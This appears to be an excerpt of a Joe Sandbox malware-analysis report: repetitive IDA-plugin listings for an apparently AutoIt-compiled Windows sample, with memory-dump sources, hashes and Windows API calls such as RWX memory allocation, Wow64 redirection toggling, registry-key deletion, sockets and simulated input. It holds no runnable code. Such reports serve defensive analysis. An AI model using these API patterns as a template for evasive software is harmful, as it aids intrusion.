                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: AddressLibraryLoadProc
                                                                    • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                    • API String ID: 2574300362-1355242751
                                                                    • Opcode ID: f50a7139c0eb3c6b488e0dbcf65d32ec720a53d994fce10f8538c402fec79357
                                                                    • Instruction ID: 03431def4457027663ff41f33a775008bc5094e4ffb0d12f1023067bcc14e31f
                                                                    • Opcode Fuzzy Hash: f50a7139c0eb3c6b488e0dbcf65d32ec720a53d994fce10f8538c402fec79357
                                                                    • Instruction Fuzzy Hash: 51D01270911713CFD7205F32D91860777D5AF05251B15882E94E5DA614E678D880C754
                                                                    APIs
                                                                    • LoadLibraryA.KERNEL32(advapi32.dll,?,01051039), ref: 01050DF5
                                                                    • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 01050E07
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: AddressLibraryLoadProc
                                                                    • String ID: RegDeleteKeyExW$advapi32.dll
                                                                    • API String ID: 2574300362-4033151799
                                                                    • Opcode ID: beb25c94d655b79683f2fde2988061d6f3bae58c4b88ba4316944dacffe4a564
                                                                    • Instruction ID: a8b12a1aa8194a33a73b2c0907bf8b99cb220c6e099f5426bcd5883f7cda8759
                                                                    • Opcode Fuzzy Hash: beb25c94d655b79683f2fde2988061d6f3bae58c4b88ba4316944dacffe4a564
                                                                    • Instruction Fuzzy Hash: C2D0C730400323CFD320AF7AC80828B76E4AF01352F208C2EA8C2C6104E7B9D090CB64
                                                                    APIs
                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,00FD4BD0,?,00FD4DEF,?,010952F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00FD4C11
                                                                    • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00FD4C23
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: AddressLibraryLoadProc
                                                                    • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                    • API String ID: 2574300362-3689287502
                                                                    • Opcode ID: a2a9a57c4872d9df309bd5f0c0ec1ae0623836490ec6e1057449d75fddbcb196
                                                                    • Instruction ID: 8e8beba90252b50a7e949639fda30149a5f4676c639f6a9f248ecccbea8ef78b
                                                                    • Opcode Fuzzy Hash: a2a9a57c4872d9df309bd5f0c0ec1ae0623836490ec6e1057449d75fddbcb196
                                                                    • Instruction Fuzzy Hash: D1D01230911713CFD7206F71D958607B6D6EF09251F158C2E94C5D6610E7B8D880CB51
                                                                    APIs
                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,00000001,01048CF4,?,0105F910), ref: 010490EE
                                                                    • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 01049100
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: AddressLibraryLoadProc
                                                                    • String ID: GetModuleHandleExW$kernel32.dll
                                                                    • API String ID: 2574300362-199464113
                                                                    • Opcode ID: db61ed2719db1138da3980566bb7511984e2ac9f2bc0eaf56dc2acf08d7606b3
                                                                    • Instruction ID: b50fe62b68b70411283afb46eade65b4250ef3de0d25fe4e44c5ea285688042d
                                                                    • Opcode Fuzzy Hash: db61ed2719db1138da3980566bb7511984e2ac9f2bc0eaf56dc2acf08d7606b3
                                                                    • Instruction Fuzzy Hash: 41D01774510713CFEB30AF36D86860776E4AF0A255B12C87E9AC6DA950E6B9C4C0CB90
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: LocalTime__swprintf
                                                                    • String ID: %.3d$WIN_XPe
                                                                    • API String ID: 2070861257-2409531811
                                                                    • Opcode ID: b73eb98e0d81e71e48318c2df3d551e57e00af45e7de83aef81db04959e734e3
                                                                    • Instruction ID: 36dabb3a8b86b1368145be736fe4a6917e30703db695cb7f8237b9092f018ac5
                                                                    • Opcode Fuzzy Hash: b73eb98e0d81e71e48318c2df3d551e57e00af45e7de83aef81db04959e734e3
                                                                    • Instruction Fuzzy Hash: ECD05B7180910DFACB18AAA09C8CCFE737CBB08201F040452F786D2244E23DC794D721
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: ca6618c45b98a17a860198018b6e612672167263d1bb4fda9d7480728d426565
                                                                    • Instruction ID: 7686dd5431c721fce9b2904f4ae8b4ba42e86d296dd1b89176280cb7221b202b
                                                                    • Opcode Fuzzy Hash: ca6618c45b98a17a860198018b6e612672167263d1bb4fda9d7480728d426565
                                                                    • Instruction Fuzzy Hash: 08C17074A00226EFDB14CF98C884EAEBBF5FF48714B148599E945EB251DB31ED81CB90
                                                                    APIs
                                                                    • CharLowerBuffW.USER32(?,?), ref: 0104E0BE
                                                                    • CharLowerBuffW.USER32(?,?), ref: 0104E101
                                                                      • Part of subcall function 0104D7A5: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0104D7C5
                                                                    • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 0104E301
                                                                    • _memmove.LIBCMT ref: 0104E314
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: BuffCharLower$AllocVirtual_memmove
                                                                    • String ID:
                                                                    • API String ID: 3659485706-0
                                                                    • Opcode ID: 12769dd897dbcd5c3aadb5337bb862a5453f393c8a6de778c02e3c0213708538
                                                                    • Instruction ID: 5183cbbfa81da16440bfdf5841f0f0642f6fdc6da9bbde410505761304974ea4
                                                                    • Opcode Fuzzy Hash: 12769dd897dbcd5c3aadb5337bb862a5453f393c8a6de778c02e3c0213708538
                                                                    • Instruction Fuzzy Hash: A0C18AB1A08301DFC744DF28C48096ABBE5FF89714F04896EF9999B362D734E945CB82
                                                                    APIs
                                                                    • CoInitialize.OLE32(00000000), ref: 010480C3
                                                                    • CoUninitialize.OLE32 ref: 010480CE
                                                                      • Part of subcall function 0102D56C: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0102D5D4
                                                                    • VariantInit.OLEAUT32(?), ref: 010480D9
                                                                    • VariantClear.OLEAUT32(?), ref: 010483AA
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                                    • String ID:
                                                                    • API String ID: 780911581-0
                                                                    • Opcode ID: b0d11d85ed3c3fb63a7ef77feb6c38dd460454e9ef760aff4115edd82f790835
                                                                    • Instruction ID: 6a53beeebf1d5b83e01be05fc9f98ba69ff811efaae44fd40522032a5d1a9f0a
                                                                    • Opcode Fuzzy Hash: b0d11d85ed3c3fb63a7ef77feb6c38dd460454e9ef760aff4115edd82f790835
                                                                    • Instruction Fuzzy Hash: 19A15BB56047019FDB50EF94C880A2EB7E5BF89714F48885EFA959B3A1CB74ED00DB42
                                                                    APIs
                                                                    • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,01062C7C,?), ref: 010276EA
                                                                    • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,01062C7C,?), ref: 01027702
                                                                    • CLSIDFromProgID.OLE32(?,?,00000000,0105FB80,000000FF,?,00000000,00000800,00000000,?,01062C7C,?), ref: 01027727
                                                                    • _memcmp.LIBCMT ref: 01027748
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: FromProg$FreeTask_memcmp
                                                                    • String ID:
                                                                    • API String ID: 314563124-0
                                                                    • Opcode ID: 65102b38eb1c2d1dc76ec47064a7d9da85bbf7dc55ce40775a965af14aad9b28
                                                                    • Instruction ID: cf77bfcaf2a5fc520d989a0c4c23cdec14c5993423bbedd46a3e5362a4434de3
                                                                    • Opcode Fuzzy Hash: 65102b38eb1c2d1dc76ec47064a7d9da85bbf7dc55ce40775a965af14aad9b28
                                                                    • Instruction Fuzzy Hash: 95814E71A00119EFCB04DFA8C988DEEB7B9FF89315F204598F545AB250DB71AE06CB60
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: Variant$AllocClearCopyInitString
                                                                    • String ID:
                                                                    • API String ID: 2808897238-0
                                                                    • Opcode ID: 436eee3398da8131e2a6fb74bdc5183a2561338e3dbb053fba2e4a33370cde4e
                                                                    • Instruction ID: f2312bd8bce420c4903e2ef8439e2f640a694de947b79506ed75c25874154817
                                                                    • Opcode Fuzzy Hash: 436eee3398da8131e2a6fb74bdc5183a2561338e3dbb053fba2e4a33370cde4e
                                                                    • Instruction Fuzzy Hash: AF51A6747043129ADB64AFAAD8A167EB7E9AF44310F14C81FE9C6C7291DF76D840CB01
                                                                    APIs
                                                                    • GetWindowRect.USER32(0151EFF0,?), ref: 01059863
                                                                    • ScreenToClient.USER32(00000002,00000002), ref: 01059896
                                                                    • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 01059903
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: Window$ClientMoveRectScreen
                                                                    • String ID:
                                                                    • API String ID: 3880355969-0
                                                                    • Opcode ID: e32d7893ab4f775df11353f3d447cdf30cc84f7dd57b5beee217e819259da9b2
                                                                    • Instruction ID: 228a651ee62c3dc7fa7b2bd857028b1eef799c1323c7a96bbaec58757d174e82
                                                                    • Opcode Fuzzy Hash: e32d7893ab4f775df11353f3d447cdf30cc84f7dd57b5beee217e819259da9b2
                                                                    • Instruction Fuzzy Hash: 37514F34A00209EFCF61CF68C884AAF7BF6FF45364F148199F9A59B291D731A941CB90
                                                                    APIs
                                                                    • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 01029AD2
                                                                    • __itow.LIBCMT ref: 01029B03
                                                                      • Part of subcall function 01029D53: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 01029DBE
                                                                    • SendMessageW.USER32(?,0000110A,00000001,?), ref: 01029B6C
                                                                    • __itow.LIBCMT ref: 01029BC3
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$__itow
                                                                    • String ID:
                                                                    • API String ID: 3379773720-0
                                                                    • Opcode ID: 5ece0cf8d83dbb2a0784ccca24588b26f7fd8546eb86f82c890aae9a023c44c8
                                                                    • Instruction ID: 83b6473e04fbb3d6e4f2163fd0ebd751f22fa45a082f9646ca8d18fc93a6ed00
                                                                    • Opcode Fuzzy Hash: 5ece0cf8d83dbb2a0784ccca24588b26f7fd8546eb86f82c890aae9a023c44c8
                                                                    • Instruction Fuzzy Hash: 1941B170A00328ABDF11EF54CC45BEE7BFAEF44714F44005AF945A7291DB749944CBA1
                                                                    APIs
                                                                    • socket.WSOCK32(00000002,00000002,00000011), ref: 010469D1
                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 010469E1
                                                                      • Part of subcall function 00FD9837: __itow.LIBCMT ref: 00FD9862
                                                                      • Part of subcall function 00FD9837: __swprintf.LIBCMT ref: 00FD98AC
                                                                    • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 01046A45
                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 01046A51
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLast$__itow__swprintfsocket
                                                                    • String ID:
                                                                    • API String ID: 2214342067-0
                                                                    • Opcode ID: e8730dbbb1a8c8e3f35b801eed4c2992367ea35577d5e6c49c6b6fa25cdf543d
                                                                    • Instruction ID: a67dc588cb1a84d453baa34bc6348d40b69e27d96f697de95e18212aea9a093a
                                                                    • Opcode Fuzzy Hash: e8730dbbb1a8c8e3f35b801eed4c2992367ea35577d5e6c49c6b6fa25cdf543d
                                                                    • Instruction Fuzzy Hash: B741B2757002006FEB60BF68CC86F7E77E69B05B10F488059FA599B3C2DAB99D019B51
                                                                    APIs
                                                                    • #16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,0105F910), ref: 010464A7
                                                                    • _strlen.LIBCMT ref: 010464D9
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: _strlen
                                                                    • String ID:
                                                                    • API String ID: 4218353326-0
                                                                    • Opcode ID: efca22169640fd81e203bb410d55f8b11c77815e21f63ff85362ffc348ceea5a
                                                                    • Instruction ID: 0904b08a099badb213b49b57f8560af5666e578afbb2cd20688c3e56b643f4af
                                                                    • Opcode Fuzzy Hash: efca22169640fd81e203bb410d55f8b11c77815e21f63ff85362ffc348ceea5a
                                                                    • Instruction Fuzzy Hash: 2841F671500105ABCB10FBA8DCD5FFEB7A9AF45310F04816AF95697392EB35AD04D790
                                                                    APIs
                                                                    • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 0103B89E
                                                                    • GetLastError.KERNEL32(?,00000000), ref: 0103B8C4
                                                                    • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 0103B8E9
                                                                    • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 0103B915
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: CreateHardLink$DeleteErrorFileLast
                                                                    • String ID:
                                                                    • API String ID: 3321077145-0
                                                                    • Opcode ID: e93cc317e80b0af44b9b1d1f9a9a0c1a3c6ad98c61026cda8564e578550680dd
                                                                    • Instruction ID: 8706bd85f555fd41b08c7063b0d28ec896ee2603139d0f317dcdc92c921a9ec2
                                                                    • Opcode Fuzzy Hash: e93cc317e80b0af44b9b1d1f9a9a0c1a3c6ad98c61026cda8564e578550680dd
                                                                    • Instruction Fuzzy Hash: 37414F39A00611DFCB11EF54C444A5DBBE6EF89714F498089EC8A9B362CB78FD01EB91
                                                                    APIs
                                                                    • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 010588DE
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: InvalidateRect
                                                                    • String ID:
                                                                    • API String ID: 634782764-0
                                                                    • Opcode ID: 75c16dc7a370d05d732192848e516e14dacb0c461f04fc50542c749c53601653
                                                                    • Instruction ID: 62cdbc4c0023fc2f1946e63a7370310b3e0fbe512d9b831e5370bce46db5a397
                                                                    • Opcode Fuzzy Hash: 75c16dc7a370d05d732192848e516e14dacb0c461f04fc50542c749c53601653
                                                                    • Instruction Fuzzy Hash: 7031C534600109FEEBE19A6ADC45BAF7BB5FB06350F588143FED1E6291C63595408B52
                                                                    APIs
                                                                    • ClientToScreen.USER32(?,?), ref: 0105AB60
                                                                    • GetWindowRect.USER32(?,?), ref: 0105ABD6
                                                                    • PtInRect.USER32(?,?,0105C014), ref: 0105ABE6
                                                                    • MessageBeep.USER32(00000000), ref: 0105AC57
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: Rect$BeepClientMessageScreenWindow
                                                                    • String ID:
                                                                    • API String ID: 1352109105-0
                                                                    • Opcode ID: efb43e83c6493c5af6c5991d173c34118f3eec44eda928ad65495473e78d3864
                                                                    • Instruction ID: 1795a8ba71c474fdcb0d693e5a1c17ede5b3ec45c6533a1f39bd345c42e261ca
                                                                    • Opcode Fuzzy Hash: efb43e83c6493c5af6c5991d173c34118f3eec44eda928ad65495473e78d3864
                                                                    • Instruction Fuzzy Hash: 6141AB34B00209DFDBA2CF58C884BAA7FF5FF48300F1882A9E9959F255D731A841CB90
                                                                    APIs
                                                                    • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 01030B27
                                                                    • SetKeyboardState.USER32(00000080,?,00000001), ref: 01030B43
                                                                    • PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 01030BA9
                                                                    • SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 01030BFB
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
